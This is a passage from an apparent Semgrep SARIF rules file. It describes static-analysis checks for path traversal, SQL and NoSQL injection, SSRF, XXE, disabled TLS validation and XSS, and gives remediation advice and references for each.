rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","id":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","name":"python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"help":{"markdown":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning)\n - [https://pytorch.org/docs/stable/data.html#memory-pinning](https://pytorch.org/docs/stable/data.html#memory-pinning)\n","text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"helpUri":"https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","id":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","name":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.automatic-memory-pinning.automatic-memory-pinning"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"help":{"markdown":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"helpUri":"https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","id":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","name":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.iterate-over-empty-map.iterate-over-empty-map"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host","id":"php.lang.security.injection.tainted-url-host.tainted-url-host","name":"php.lang.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint","id":"rust.actix.nosql.mongodb-taint.mongodb-taint","name":"rust.actix.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","id":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","name":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Dangerous client config used, ensure SSL verification"},"help":{"markdown":"Dangerous client config used, ensure SSL verification\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous)\n - [https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html](https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html)\n - [https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous](https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous)\n","text":"Dangerous client config used, ensure SSL verification"},"helpUri":"https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous","id":"rust.lang.security.rustls-dangerous.rustls-dangerous","name":"rust.lang.security.rustls-dangerous.rustls-dangerous","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.rustls-dangerous.rustls-dangerous"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"help":{"markdown":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","id":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","name":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","id":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","name":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"help":{"markdown":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards)\n - [https://developer.apple.com/documentation/uikit/uipasteboard?language=swift](https://developer.apple.com/documentation/uikit/uipasteboard?language=swift)\n - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)\n","text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"helpUri":"https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","id":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","name":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"help":{"markdown":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param)\n - [https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm](https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm)\n","text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"helpUri":"https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","id":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","name":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the 